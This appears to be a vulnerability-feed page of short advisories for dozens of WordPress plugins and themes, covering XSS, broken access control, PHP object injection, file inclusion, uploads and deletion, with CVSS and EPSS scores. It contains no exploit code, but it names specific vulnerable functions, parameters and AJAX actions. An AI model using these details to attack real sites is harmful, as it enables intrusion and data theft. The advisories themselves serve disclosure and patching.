WordPress
Monthly
Stored cross-site scripting (XSS) in WP Microdata WordPress plugin version 1.0 and earlier allows authenticated users or lower-privileged administrators to inject malicious scripts that execute in the browsers of site visitors, potentially leading to credential theft, session hijacking, or malware distribution. The vulnerability stems from improper input sanitization during web page generation. EPSS score of 0.04% indicates low exploitation probability in real-world conditions.
Unauthenticated arbitrary file upload vulnerability in File Uploader for WooCommerce (WordPress plugin versions ≤1.0.3) enables remote code execution. Missing file type validation in the 'add-image-data' REST API endpoint allows attackers to upload malicious files to Uploadcare service and retrieve them to the web server, achieving code execution without authentication. Exploitation requires no user interaction or special privileges (CVSS:3.1 AV:N/AC:L/PR:N/UI:N). No public exploit identified at time of analysis.
Unauthenticated attackers can retrieve sensitive Google API keys from the Pretty Google Calendar WordPress plugin (versions up to 2.0.0) by exploiting a missing capability check in the pgcal_ajax_handler() AJAX function. The vulnerability allows direct read access to configured API credentials without authentication, enabling credential harvesting for downstream API abuse. No public exploit code or active exploitation has been confirmed at time of analysis; however, the low CVSS score (5.3) and very low EPSS percentile (21%) reflect that while the vulnerability is real, real-world exploitation likelihood remains minimal due to the ease of detection and limited direct impact compared to data exfiltration or system compromise.
Stored XSS in SlimStat Analytics for WordPress allows unauthenticated attackers to inject malicious scripts via unsanitized 'outbound_resource' parameter in slimtrack AJAX action (versions ≤5.3.2). Injected scripts execute when any user accesses the compromised page, enabling session hijacking, credential theft, or privilege escalation. Affects all installations with publicly accessible AJAX endpoints. No public exploit identified at time of analysis.
Missing authorization in PickPlugins Post Grid and Gutenberg Blocks WordPress plugin (versions through 2.3.17) allows attackers to bypass access control restrictions and exploit incorrectly configured security levels, potentially enabling unauthorized access to protected content or administrative functions. The vulnerability stems from broken access control (CWE-862) with no public exploit code confirmed at time of analysis, though EPSS scoring of 0.04% suggests minimal real-world exploitation probability despite the authorization flaw.
DOM-based cross-site scripting (XSS) in Crocoblock JetElements For Elementor plugin versions up to 2.7.12 allows attackers to inject malicious scripts into web pages through improper input neutralization during page generation. The vulnerability affects WordPress sites using this Elementor page builder extension and can enable session hijacking, credential theft, or malware distribution against site visitors. EPSS exploitation probability is low at 0.04%, but the attack vector is likely network-based requiring no authentication.
Authorization bypass in RadiusTheme Radius Blocks WordPress plugin through version 2.2.1 allows attackers to exploit incorrectly configured access control security levels via user-controlled keys, enabling unauthorized access to restricted functionality. The vulnerability is classified as an insecure direct object reference (IDOR) issue affecting the plugin's access control implementation. While no CVSS score is available and EPSS indicates low exploitation probability (0.04%), the vulnerability demonstrates a fundamental authentication design flaw that could permit escalation of privileges within WordPress installations using this plugin.
Authorization bypass in PickPlugins Post Grid and Gutenberg Blocks WordPress plugin through version 2.3.23 allows attackers to exploit incorrectly configured access control via user-controlled keys, potentially enabling unauthorized access to post content or plugin functionality. The vulnerability is classified as CWE-639 (Authorization Through User-Controlled Key) and presents a low exploitation probability (EPSS 0.04%, 13th percentile) with no public exploit code or active exploitation confirmed at time of analysis.
Sermon Manager for WordPress plugin through version 2.30.0 allows unauthenticated attackers to exploit missing authorization checks to access or modify sermon data due to incorrectly configured access control security levels. The vulnerability stems from CWE-862 (Missing Authorization) and affects all installations running the vulnerable version range. With an EPSS score of 0.04% (13th percentile), real-world exploitation probability is minimal despite the permission-based nature of the flaw.
WP AI CoPilot plugin for WordPress versions through 1.2.7 exposes sensitive information embedded within sent data, allowing attackers to retrieve confidential details without proper access controls. The vulnerability stems from inadequate handling of sensitive data in communications, classified as information disclosure with an EPSS score of 0.04% indicating low real-world exploitation probability. No public exploit code has been identified at time of analysis.
Missing authorization controls in Sparkle FSE WordPress theme versions 1.0.9 and earlier allow unauthenticated attackers to bypass access control restrictions and perform unauthorized actions through exploitable endpoint misconfigurations. This authentication bypass vulnerability, reported by Patchstack security researchers, affects all instances of the Sparkle FSE theme up to version 1.0.9 with low exploit probability (EPSS 0.05%) but represents a direct authorization failure (CWE-862) that could enable unauthorized data access or modification depending on endpoint exposure.
Missing authorization controls in sparklewpthemes Construction Light WordPress theme versions 1.6.7 and earlier allow unauthenticated attackers to bypass access restrictions and access resources that should be protected by role-based access control. The vulnerability stems from incorrectly configured access control security levels, potentially exposing sensitive functionality or data to unauthorized users.
PHP object injection in PDF for Elementor Forms WordPress plugin (versions ≤6.5.0) enables unauthenticated remote attackers to execute arbitrary code or manipulate application state through unsafe deserialization of user-controlled data. EPSS probability is low (0.06%, 19th percentile), and no public exploit identified at time of analysis. However, the unauthenticated remote attack vector (CVSS AV:N/PR:N) and high confidentiality impact warrant immediate patching for sites using this plugin.
Object injection via unsafe deserialization in PDF Invoice Builder for WooCommerce plugin allows authenticated attackers with low privileges to execute arbitrary PHP code, manipulate application objects, or trigger other malicious actions. Affects all versions through 6.5.0. No public exploit identified at time of analysis, with EPSS probability of 0.07% suggesting minimal real-world exploitation activity despite high CVSS score.
Object injection via unsafe deserialization in PDF for WPForms plugin (versions ≤6.5.0) enables authenticated attackers to execute arbitrary PHP code or manipulate application state. The CVSS score of 8.8 reflects network-based exploitation with low complexity requiring only low-privileged authentication. EPSS probability of 0.07% (22nd percentile) suggests limited exploitation likelihood. No public exploit code or CISA KEV listing identified at time of analysis, indicating this remains a theoretical risk requiring proactive patching.
Object injection via unsafe deserialization in PDF for Contact Form 7 WordPress plugin (versions ≤6.5.0) allows authenticated attackers to execute arbitrary PHP code or manipulate application state. Attack requires low-privileged user credentials but no user interaction, with network-accessible attack vector. EPSS probability remains low (0.07%, 22nd percentile) and no active exploitation confirmed at time of analysis. Publicly available exploit code exists per Patchstack disclosure.
PHP object injection in PDF for Gravity Forms + Drag And Drop Template Builder (WordPress plugin) versions up to 6.5.0 allows authenticated attackers with low privileges to execute arbitrary code or manipulate application logic via unsafe deserialization. CVSS 7.5 (High) but EPSS probability of 0.07% (22nd percentile) indicates low observed exploitation likelihood. No public exploit identified at time of analysis, and attack requires high complexity (AC:H) with authenticated access (PR:L).
Local file inclusion (LFI) in Task Manager WordPress plugin versions ≤3.0.2 allows unauthenticated remote attackers to read arbitrary files from the server through improper filename control in PHP include/require statements. With a 7.5 CVSS score but only 0.06% EPSS (18th percentile), this represents high theoretical impact with low observed exploitation probability. No confirmed active exploitation (not in CISA KEV) or public exploit code identified at time of analysis. Patchstack security research disclosed this vulnerability affecting the Agence web Eoxia Task Manager plugin.
Local file inclusion in Ray Enterprise Translation WordPress plugin (versions ≤1.7.1) allows unauthenticated remote attackers to read arbitrary files from the server. CVSS 7.5 HIGH due to network-accessible exploitation with no authentication required. EPSS score of 0.06% (20th percentile) indicates low observed exploitation probability. No active exploitation confirmed (not in CISA KEV); no public exploit identified at time of analysis. Despite high CVSS, real-world risk appears moderate given low EPSS and information disclosure-only impact.
Local file inclusion in Riode WordPress theme versions up to 1.6.23 allows remote attackers to read arbitrary files on the server through improper PHP file inclusion controls. The vulnerability requires user interaction (UI:R) but no authentication (PR:N), enabling unauthorized access to sensitive configuration files, credentials, or source code. EPSS score of 0.06% (18th percentile) indicates low observed exploitation probability; no public exploit identified at time of analysis and not listed in CISA KEV.
Local File Inclusion (LFI) in BZOTheme Monki WordPress theme versions through 2.0.5 allows unauthenticated remote attackers to include and execute arbitrary PHP files on the server, potentially leading to remote code execution, information disclosure, or complete system compromise. Despite the high 8.1 CVSS score, real-world exploitation probability remains low (EPSS 0.17%, 38th percentile) with no confirmed active exploitation or public exploit code identified at time of analysis. The vulnerability stems from improper filename validation in PHP include/require statements, classified as CWE-98.
Gutenberg Essential Blocks plugin for WordPress up to version 5.7.2 allows authenticated authors and above to access sensitive API keys for Instagram, Google Maps, and other external services due to missing capability checks on several callback functions. The vulnerability requires WordPress Author-level or higher privileges and carries a low real-world risk given the constrained attack surface and low EPSS score of 0.04%, though it does expose plaintext credentials to a wider internal threat model than intended.
Authorization bypass in Essential Real Estate WordPress plugin versions through 5.2.9 allows authenticated users to access sensitive real estate data they should not have permission to view through user-controlled key manipulation. The vulnerability exploits incorrectly configured access control at the application level, enabling privilege escalation from a standard user account to view confidential information such as property details or pricing. No public exploit code has been identified, and the EPSS score of 0.04% indicates low exploitation probability despite the CVSS 6.5 severity rating.
Stored cross-site scripting (XSS) in VK Google Job Posting Manager WordPress plugin versions up to 1.2.22 allows authenticated users with low privileges to inject malicious scripts that execute in the context of other users' browsers, potentially compromising site administrators. The vulnerability requires user interaction (clicking a link or viewing a malicious page) to trigger payload execution and affects the plugin's web page generation functionality. EPSS probability of exploitation is notably low at 0.04%, suggesting this is primarily a theoretical risk without documented active exploitation.
SQL injection in LambertGroup LBG Zoominoutslider WordPress plugin versions ≤5.4.4 enables authenticated attackers with low privileges to execute arbitrary SQL commands with potential for cross-site impact. The vulnerability carries an 8.5 CVSS score but shows low real-world exploitation probability (EPSS 0.04%, 14th percentile) with no confirmed active exploitation or public proof-of-concept code identified at time of analysis.
Stored cross-site scripting (XSS) in Premio Stars Testimonials WordPress plugin versions 3.3.4 and below allows authenticated users to inject malicious scripts that execute in the context of other users' browsers, potentially compromising site administrators or visitors. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting immediate risk, but the stored nature means injected payloads persist and affect multiple users. No public exploit code or active KEV status is documented, though the 6.5 CVSS score reflects moderate severity when considering cross-site impact.
Missing authorization in NinjaTeam FileBird Pro WordPress plugin versions up to 6.5.1 allows authenticated users to access and modify files they should not have permission to view or edit due to incorrectly configured access control security levels. The vulnerability requires valid user credentials but can lead to disclosure and modification of sensitive files within the plugin's file management interface. EPSS exploitation probability is low at 0.04%, and no public exploit code has been identified at the time of analysis.
Broken access control in Yaad Sarig Payment Gateway for WooCommerce (versions ≤2.2.11) allows unauthenticated remote attackers to bypass authorization checks and gain unauthorized access to payment gateway functions. With CVSS 9.1 (Critical) scoring reflecting network-accessible exploitation requiring no privileges or user interaction, attackers can read or modify sensitive payment data. EPSS score of 0.04% (14th percentile) suggests low observed exploitation probability despite severity. No public exploit identified at time of analysis, though the authentication bypass tag indicates potential for unauthorized transaction manipulation or data exposure in WordPress e-commerce environments.
Missing authorization in g5theme Essential Real Estate WordPress plugin version 5.2.9 and earlier allows authenticated users to access or modify restricted resources by exploiting inadequately configured access controls. An attacker with low-privilege WordPress account credentials can leverage the broken access control to view sensitive information and make unauthorized modifications without requiring administrative approval. No public exploit code is currently identified, though the vulnerability is documented in the Patchstack security database.
Unauthenticated remote attackers can bypass access controls in ZEEN101 Leaky Paywall WordPress plugin versions up to 4.22.6, gaining unauthorized access to restricted content through incorrectly configured security levels. The vulnerability requires no user interaction and can be exploited over the network, though it is limited to information disclosure (CVSS 5.3, EPSS 0.04%). No public exploit code or active exploitation has been identified at time of analysis.
Missing authorization in WP Compress for MainWP plugin versions up to 6.50.17 allows unauthenticated remote attackers to modify plugin settings due to incorrectly configured access control, affecting integrity of compressed content and plugin configuration without requiring authentication or user interaction.
Broken access control in ThemeFusion Avada WordPress theme through version 7.13.2 allows authenticated attackers with low privileges to access functionality improperly constrained by access control lists, potentially achieving full site compromise. With CVSS 8.8 (High) due to network-based access requiring only low-privilege authentication, attackers can achieve high confidentiality, integrity, and availability impact. EPSS probability remains low at 0.06% (18th percentile), and no public exploit identified at time of analysis, suggesting limited immediate exploitation risk despite the critical CVSS rating.
Unauthenticated remote attackers can access sensitive sitemap data in Google XML Sitemaps WordPress plugin versions through 4.1.22 due to missing authorization checks on sitemap endpoints. The vulnerability allows unauthorized information disclosure of site structure and indexed pages without requiring authentication or user interaction. While the CVSS score is moderate (5.3), real-world exploitation probability is very low (EPSS 0.04th percentile), suggesting this is primarily an information disclosure risk rather than an active threat.
WCFM Marketplace plugin through version 3.7.1 fails to properly enforce authorization controls, allowing authenticated users with limited privileges to cause denial of service or access functionality they should not have. The vulnerability affects the WordPress plugin across all installations through the specified version, exploiting incorrectly configured access control security levels via network-accessible endpoints. With an EPSS score of 0.05% and low real-world exploitation probability, this represents a privilege escalation risk primarily for multi-vendor marketplace administrators.
Open redirect vulnerability in wpWax Directorist WordPress plugin versions up to 8.6.6 allows unauthenticated remote attackers to redirect users to arbitrary external websites via crafted URL parameters, enabling phishing attacks. The vulnerability requires user interaction (clicking a malicious link) but has a network attack vector with low complexity. EPSS exploitation probability is very low at 0.04%, and no active exploitation or public proof-of-concept has been identified.
Missing authorization in the WordPress Read More & Accordion plugin (expand-maker) versions 3.5.5.1 and earlier allows authenticated users to access restricted functionality through incorrectly configured access controls, potentially revealing sensitive information. The vulnerability requires user authentication and network access but carries a CVSS score of 6.5 due to high confidentiality impact, though real-world exploitation probability remains low at 0.04% EPSS. No public exploit code or active exploitation has been identified at time of analysis.
Inadequately configured access control in Easy Property Listings WordPress plugin versions 3.5.21 and earlier allows authenticated users to access sensitive information they should not be authorized to view. An authenticated attacker with user-level privileges can bypass authorization checks to read property listing data or other restricted content due to missing authorization validation on API endpoints or functionality. EPSS exploitation probability is very low at 0.04%, and no public exploit code has been identified, indicating limited real-world threat despite the authentication-bypass tag.
Authenticated users with limited privileges can access search and replace functionality in CM On Demand Search And Replace WordPress plugin (versions up to 1.5.5) due to missing authorization checks on restricted features. An attacker with basic user credentials can perform privileged actions intended only for administrators, affecting data confidentiality through unauthorized content access. This is confirmed as an authentication bypass vulnerability with low real-world exploitation probability (EPSS 0.04%) despite the missing authorization flaw.
Missing authorization in WCFM - Frontend Manager for WooCommerce through version 6.7.24 allows authenticated users with limited privileges to bypass access controls via incorrectly configured security levels, enabling read-only disclosure of sensitive information. The vulnerability requires user interaction and has a low EPSS score (0.03%, 10th percentile), indicating minimal real-world exploitation probability despite the authentication requirement.
Authenticated attackers with Contributor-level access or above can delete or generate featured images on posts they do not own in the Auto Featured Image (Auto Post Thumbnail) WordPress plugin through version 4.2.1, due to a missing capability check in the bulk_action_generate_handler function. The vulnerability requires user authentication and has a CVSS score of 4.3; no public exploit code or active exploitation has been confirmed at the time of analysis.
Reflected cross-site scripting (XSS) in WPS Visitor Counter WordPress plugin through version 1.4.8 allows remote attackers to inject malicious scripts via the REQUEST_URI parameter, which is output without sanitization in HTML attributes. The vulnerability has a CVSS score of 5.8 and requires user interaction (clicking a crafted link), with exploitation limited primarily to older web browsers due to modern XSS protections. No public exploit code or active exploitation has been identified at the time of analysis.
The HAPPY Helpdesk Support Ticket System WordPress plugin up to version 1.0.9 allows authenticated attackers with Subscriber-level access to submit replies to arbitrary support tickets by bypassing authorization checks on the 'submit_form_reply' AJAX action. The vulnerability stems from missing capability validation before processing ticket replies, enabling low-privileged users to manipulate the 'happy_topic_id' parameter and interact with tickets they do not own or are not assigned to. While the CVSS score of 4.3 reflects low-to-medium severity with integrity impact only, the EPSS percentile of 13% and absence of evidence of active exploitation suggest this is not an immediate critical priority, though it should be patched to prevent unauthorized ticket interference.
PHP object injection in Doubly Cross Domain Copy Paste plugin (≤1.0.46) allows authenticated attackers with Subscriber-level privileges to execute arbitrary code via deserialized untrusted input from uploaded ZIP archives. Exploitation requires administrators to explicitly enable Subscriber access. Available POP chains enable code execution, file deletion, and sensitive data retrieval. Attack vector requires low privilege (PR:L) authentication with network accessibility and no user interaction. No public exploit identified at time of analysis.
Unauthorized data modification in AnnunciFunebri Impresa WordPress plugin through version 4.7.0 allows authenticated subscribers to reset all plugin options via the missing capability check on annfu_reset_options() function. Attackers with Subscriber-level access can delete all 29 plugin configuration options, reverting the plugin to default state without administrative authorization. No public exploit code or active exploitation has been identified at time of analysis.
Popup Builder (Easy Notify Lite) plugin for WordPress versions up to 1.1.37 allows authenticated attackers with Subscriber-level access to reset plugin settings to default values due to missing capability checks in the easynotify_cp_reset() function. The vulnerability requires user authentication and does not grant elevated privileges or information disclosure, resulting in a CVSS score of 5.4 (medium severity). No public exploit code or active exploitation has been identified at time of analysis, though the issue poses moderate risk to WordPress installations relying on plugin configuration integrity.
Authentication bypass in JAY Login & Register plugin for WordPress versions ≤2.4.01 allows unauthenticated remote attackers to impersonate any site user, including administrators, by exploiting flawed cookie validation in the user-switching function. Attackers require only knowledge of target user IDs to gain complete account access without credentials. No public exploit identified at time of analysis.
Authenticated attackers with Subscriber-level access can modify tracking settings in the Employee Spotlight WordPress plugin (versions up to 5.1.3) due to missing authorization checks in the employee_spotlight_check_optin() function. The vulnerability allows privilege escalation to perform account integrity modifications that should require administrator approval, affecting all installations of this plugin without patches applied.
Simple Bike Rental WordPress plugin versions up to 1.0.6 allow authenticated subscribers to retrieve sensitive customer booking data due to missing capability checks on the 'simpbire_carica_prenotazioni' AJAX action. Attackers with subscriber-level access can exfiltrate personally identifiable information including names, email addresses, and phone numbers from all booking records. CVSS 4.3 reflects the moderate severity of unauthorized information disclosure without requiring administrative access.
Authenticated attackers with Subscriber-level access can duplicate arbitrary WordPress posts via the PDF for Contact Form 7 + Drag and Drop Template Builder plugin (versions up to 6.3.3) due to missing capability checks in the 'rednumber_duplicate' function. This allows disclosure of sensitive content including password-protected and private posts. The vulnerability requires authentication but exploits insufficient privilege validation, creating a post enumeration and information disclosure risk for multi-user WordPress installations. No public exploit code or active exploitation has been confirmed at the time of analysis.
WP Fastest Cache Premium plugin versions up to 1.7.4 contain a Server-Side Request Forgery (SSRF) vulnerability in the 'get_server_time_ajax_request' AJAX action that allows authenticated Subscriber-level users to send arbitrary web requests originating from the server, potentially enabling reconnaissance and manipulation of internal services. The free version is unaffected. No public exploit code has been identified at time of analysis, with a very low EPSS score of 0.04% indicating minimal real-world exploitation likelihood despite the authenticated attack vector.
Stored Cross-Site Scripting in WP Job Portal plugin for WordPress up to version 2.4.4 allows authenticated attackers with Editor-level access or higher to inject arbitrary JavaScript into job description fields by exploiting explicit whitelisting of the `<script>` tag in the WPJOBPORTAL_ALLOWED_TAGS configuration. The injected scripts execute when users view affected job listings, enabling session hijacking, credential theft, and other malicious activities. Impact is limited to multi-site installations or sites with unfiltered_html disabled. CVSS score of 4.4 reflects the high privilege requirement (PR:H) and high attack complexity (AC:H), though the vulnerability affects a potentially large number of WordPress installations.
Cross-Site Request Forgery in Resource Library for Logged In Users WordPress plugin (all versions up to 1.5) allows unauthenticated attackers to perform unauthorized administrative actions including creating, editing, and deleting resources and categories by tricking a site administrator into clicking a malicious link. The vulnerability stems from missing nonce validation on multiple administrative functions. With an EPSS score of 0.02% and low real-world exploitation probability despite the CVSS 4.3 score, this represents a lower-priority vulnerability requiring user interaction and administrative privileges on the target site.
Arbitrary file deletion in Multi Uploader for Gravity Forms (WordPress plugin ≤1.1.7) allows unauthenticated remote attackers to delete any file on the server through insufficient path validation in the plupload_ajax_delete_file function. Exploitation requires no credentials or user interaction. CVSS 9.8 Critical severity reflects network-accessible attack with high impact to confidentiality, integrity, and availability. Low observed exploitation activity (EPSS 0.37%). No public exploit identified at time of analysis.
Authenticated attackers with WordPress Subscriber-level access and above can modify arbitrary plugin settings in the Vimeo SimpleGallery plugin versions up to 0.2 due to missing authorization checks on the vimeogallery_admin function. The vulnerability allows privilege escalation within WordPress, enabling lower-privileged users to alter plugin configurations they should not have access to. No public exploit code or active exploitation has been identified at the time of analysis.
BuddyTask plugin for WordPress versions up to 1.3.0 fails to enforce capability checks on multiple AJAX endpoints, allowing authenticated subscribers and above to view, create, modify, and delete task boards in any BuddyPress group regardless of membership or group privacy settings. The CVSS 5.4 (Medium) rating reflects confidentiality and integrity impacts limited to group task data with low attack complexity and no user interaction required, though the actual organizational risk depends on BuddyPress deployment scope and task board sensitivity.
Stored Cross-Site Scripting in Bold Timeline Lite WordPress plugin up to version 1.2.7 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the 'title' parameter of the 'bold_timeline_group' shortcode, executing malicious scripts whenever users view affected pages. CVSS 6.4 reflects moderate impact (confidentiality and integrity compromise across trust boundaries); EPSS 0.04% indicates low real-world exploitation probability. No public exploit code or active exploitation confirmed.
Arbitrary file read in WatchTowerHQ WordPress plugin versions up to 3.16.0 allows authenticated administrators with valid access tokens to read sensitive server files via path traversal in the 'wht_download_big_object_origin' parameter. The vulnerability exploits insufficient path validation in the handle_big_object_download_request function, potentially exposing database credentials and authentication keys. No public exploit code or active exploitation has been confirmed at time of analysis.
Stored Cross-Site Scripting in BUKAZU Search widget plugin for WordPress allows authenticated attackers with Contributor-level access and above to inject arbitrary JavaScript through the 'shortcode' parameter of the 'bukazu_search' shortcode. The vulnerability affects all versions up to and including 3.3.2 and results from insufficient input sanitization and output escaping. Malicious scripts execute in the context of any user accessing affected pages. EPSS score of 0.04% indicates low real-world exploitation probability despite moderate CVSS 6.4 severity.
Stored Cross-Site Scripting in NewStatPress WordPress plugin versions up to 1.4.3 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript into pages via a regex bypass in the nsp_shortcode function. When site visitors access pages containing the injected malicious shortcode attribute, the attacker's script executes in their browsers, enabling session hijacking, credential theft, or malware distribution. No public exploit code has been identified; EPSS score of 0.04% reflects the requirement for authenticated access and user interaction.
Premmerce Wishlist for WooCommerce plugin versions up to 1.1.10 fails to enforce authorization checks on the deleteWishlist() function, allowing authenticated Subscriber-level users to delete arbitrary wishlists belonging to other users. The vulnerability stems from missing capability validation rather than authentication bypass; while the CVSS vector indicates unauthenticated access (PR:N), the description specifies Subscriber-level authentication is required, suggesting the vector may reflect the function's accessibility rather than actual authentication bypass. With EPSS of 0.04% and no public exploit code identified, real-world exploitation risk is minimal despite the authorization flaw.
Arbitrary file deletion in WP User Manager plugin versions up to 2.9.12 allows authenticated attackers with Subscriber-level privileges to delete critical files via improper validation of the 'current_user_avatar' parameter when custom avatar functionality is enabled. The vulnerability exploits PHP's filter_input() function's handling of array inputs combined with insufficient path validation, enabling a two-stage attack that can facilitate remote code execution by deleting essential files. No public exploit code has been identified at the time of analysis, though the low EPSS score (0.29%) suggests limited real-world exploitation likelihood despite the moderate CVSS rating.
Unauthenticated attackers can modify plugin settings and create arbitrary filter options in the Filter Plus plugin for WordPress (versions up to 1.1.6) due to missing capability checks on AJAX actions 'filter_save_settings' and 'add_filter_options'. This allows unauthorized data modification with no confidentiality impact but enables attackers to alter product filtering functionality without authentication. The vulnerability has a low EPSS score (0.08%, 23rd percentile) despite network accessibility, indicating limited real-world exploitation likelihood.
Authenticated arbitrary file upload in Infility Global WordPress plugin versions ≤2.14.42 permits remote code execution. The upload_file function accepts spoofed MIME types without verifying file extensions, while import_data lacks capability checks, allowing subscriber-level users to upload malicious files (e.g., PHP webshells) to the server. CVSS:3.1 score 8.8 (High) reflects network-accessible, low-complexity exploitation requiring only low-privilege authentication. No public exploit identified at time of analysis. EPSS 0.35% indicates low observed exploitation activity.
Unauthenticated payment bypass in Campay Woocommerce Payment Gateway plugin (versions up to 1.2.2) allows remote attackers to mark orders as successfully completed without actually processing payment, directly resulting in financial loss. The vulnerability stems from insufficient transaction validation in the payment processing workflow, enabling attackers to manipulate order status through the payment gateway interface.
Reflected cross-site scripting (XSS) in Accept Stripe Payments Using Contact Form 7 WordPress plugin versions up to 3.1 allows unauthenticated attackers to inject arbitrary JavaScript via the 'failure_message' parameter due to insufficient input sanitization and output escaping. An attacker can craft a malicious link that, when clicked by a victim, executes JavaScript in the victim's browser session with access to sensitive data or session tokens. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stored cross-site scripting in Better Elementor Addons plugin for WordPress up to version 1.5.5 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript through insufficiently sanitized Slider widget attributes, which executes when any user views the affected page. This is a stored XSS vulnerability affecting a widely-deployed WordPress plugin; no public exploit code or active exploitation has been confirmed at time of analysis, but the low CVSS complexity (AC:L) and moderate EPSS exploitation probability make this a practical concern for any WordPress site running the vulnerable plugin versions with user roles permitted to edit pages.
Premmerce Brands for WooCommerce plugin versions up to 1.2.13 allow authenticated attackers with Subscriber-level access to modify brand permalink settings due to a missing capability check in the saveBrandsSettings function. The vulnerability requires only network access and low-privilege authentication, enabling unauthorized data modification of WordPress brand configuration without user interaction.
WP Job Portal plugin for WordPress allows authenticated attackers with Subscriber-level access to read arbitrary files on the server through path traversal in the 'downloadCustomUploadedFile' function, potentially exposing sensitive configuration files, database credentials, or other confidential data. The vulnerability affects all versions up to and including 2.4.0, with CVSS 6.5 reflecting the high confidentiality impact but low attack complexity and requirement only for basic authenticated access.
WPForms Google Sheet Connector plugin through version 4.0.0 allows unauthenticated remote attackers to modify data by exploiting missing authorization checks on access control mechanisms. The vulnerability enables unauthorized manipulation of form submissions and Google Sheet integrations without proper permission validation, affecting WordPress installations using this plugin.
Deserialization of untrusted data in WP Maps WordPress plugin versions up to 4.8.6 allows high-privileged authenticated users to inject and instantiate arbitrary PHP objects, potentially leading to code execution or privilege escalation. While the CVSS score of 6.5 reflects high confidentiality and integrity impact, the requirement for administrator-level privileges (PR:H) and user interaction (UI:R) significantly constrains real-world exploitability. EPSS score of 0.04% indicates minimal observed exploitation likelihood despite the vulnerability's technical severity.
Happy Addons for Elementor through version 3.20.3 allows authenticated users to access functionality they should not have permission to use due to missing authorization checks on API endpoints or admin functions. The vulnerability requires valid user authentication and results in information disclosure, with a CVSS score of 4.3 and an extremely low EPSS exploitation probability of 0.04%, suggesting minimal real-world attack incentive despite the access control flaw.
DOM-based cross-site scripting (XSS) in muffingroup Betheme WordPress theme versions up to 28.2 allows authenticated attackers with low privileges to inject malicious scripts that execute in the context of other users' browsers. The vulnerability requires user interaction (UI:R) and affects the confidentiality, integrity, and availability of affected installations; EPSS exploitation probability is low at 0.04%, and no public exploit code or active exploitation has been confirmed.
Local File Inclusion in Dream-Theme's The7 WordPress theme (versions prior to 12.8.1.1) allows authenticated attackers with low privileges to read arbitrary server files through improper filename validation in PHP include statements. With a 0.17% EPSS score and no confirmed active exploitation, this represents a moderate risk primarily in shared hosting environments where authenticated users exist. The 7.5 CVSS score reflects high confidentiality and integrity impact, though exploitation requires high attack complexity and authenticated access.
DOM-based cross-site scripting in Dream-Theme The7 WordPress theme versions before 12.9.0 allows authenticated users to inject malicious scripts that execute in the context of other users' browsers via improperly sanitized input during web page generation. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting real-world exploitability despite a moderate CVSS score of 6.5. EPSS exploitation probability is low at 0.04th percentile, and no public exploit code or active exploitation has been reported.
Insertion of sensitive information into sent data in auxin-elements WordPress plugin versions up to 2.17.15 allows unauthenticated remote attackers to retrieve embedded sensitive data through network-accessible responses. The vulnerability exposes information with low confidentiality impact and affects the Shortcodes and extra features for Phlox theme plugin across all versions through 2.17.15, with EPSS scoring indicating 0.04% likelihood of exploitation.
Improper HTML tag neutralization in sevenspark Contact Form 7 - Dynamic Text Extension through version 5.0.5 allows unauthenticated remote attackers to inject malicious scripts via a network-based attack with no user interaction required, resulting in confidentiality compromise through information disclosure. The vulnerability is classified as cross-site scripting (XSS) with low exploitability probability (EPSS 0.06%, percentile 18%), suggesting limited real-world attack incentive despite the network-accessible attack vector.
Porto Theme - Functionality plugin for WordPress (versions before 3.7.3) allows authenticated users to access sensitive information through broken access control, enabling privilege escalation or information disclosure without proper authorization checks. While the vulnerability requires valid WordPress credentials and has low CVSS severity (4.3), the confirmed patch availability and authentication requirement reduce immediate risk. No public exploit code or active exploitation has been identified at the time of analysis.
Stored cross-site scripting (XSS) in Porto Theme - Functionality plugin for WordPress allows authenticated users with low privileges to inject malicious scripts into web pages that execute in the browsers of other site visitors. The vulnerability affects Porto Theme - Functionality versions below 3.7.3 and has a low exploitation probability (EPSS 0.01%), but requires user interaction and authenticated access to exploit, limiting immediate risk to well-managed WordPress installations with access controls.
Media Library Assistant WordPress plugin through version 3.29 allows authenticated users to bypass authorization controls and access or modify content they should not have permission to reach via user-controlled keys in access control mechanisms. The vulnerability requires an authenticated user with limited privileges (PR:L) and affects confidentiality and integrity of stored media library data, though with relatively low exploitation probability (EPSS 0.04%) and no confirmed active exploitation at time of analysis.
Custom Field Template WordPress plugin through version 2.7.6 exposes sensitive system information to high-privilege local users via embedded data retrieval, allowing administrators to access confidential data they should not have access to. The vulnerability requires high administrative privileges and local access, limiting real-world exploitation risk despite the complete confidentiality impact. EPSS probability is minimal at 0.02%, indicating low likelihood of opportunistic exploitation.
DOM-based cross-site scripting in WordPress plugin WP Ultimate Review versions ≤2.3.7 allows remote attackers to execute malicious JavaScript in victims' browsers via crafted input that is improperly sanitized during client-side page rendering. The vulnerability requires user interaction (CVSS UI:R) but no authentication (PR:N), enabling attacks via social engineering or malicious links. Exploitation probability is low (EPSS 0.04%, 14th percentile), with no public exploit identified at time of analysis and no confirmed active exploitation (not in CISA KEV).
Authenticated users can access sensitive contact form data and functionality they should not have permission to view or modify due to missing authorization checks in Contact Form by BestWebSoft plugin versions up to 4.3.6. The vulnerability allows logged-in attackers with low-level privileges to bypass access controls and view contact information or modify form settings with only network access and no additional user interaction required. This is not actively exploited according to available intelligence, though the access control bypass pattern is a common attack vector.
Stored cross-site scripting (XSS) in Master Addons for Elementor through version 2.0.9.9.4 allows authenticated users with limited privileges to inject malicious scripts that execute in the browsers of other site visitors, potentially compromising administrator accounts or stealing sensitive data. The vulnerability requires user interaction (UI:R) and affects the plugin's input sanitization during web page generation. With an EPSS score of 0.04% and no confirmed active exploitation, this represents a lower real-world risk despite the moderate CVSS base score of 6.5.
Missing authorization in ExpressTech Systems Quiz And Survey Master WordPress plugin through version 10.3.2 allows unauthenticated remote attackers to read sensitive quiz and survey data by exploiting incorrectly configured access control security levels. The vulnerability is assigned CVSS 5.3 (moderate), affects the plugin across multiple versions, and enables unauthorized information disclosure without requiring authentication or user interaction.
Stored cross-site scripting (XSS) in SimpLy Gallery WordPress plugin (versions up to 3.3.2.1) allows authenticated users with low privileges to inject malicious scripts that execute in the browsers of other site visitors, potentially leading to session hijacking, credential theft, or site defacement. The vulnerability requires user interaction (UI:R) and affects confidentiality, integrity, and availability. No public exploit code or active exploitation has been confirmed; EPSS score of 0.04% indicates low real-world exploitation probability despite the moderate CVSS rating.
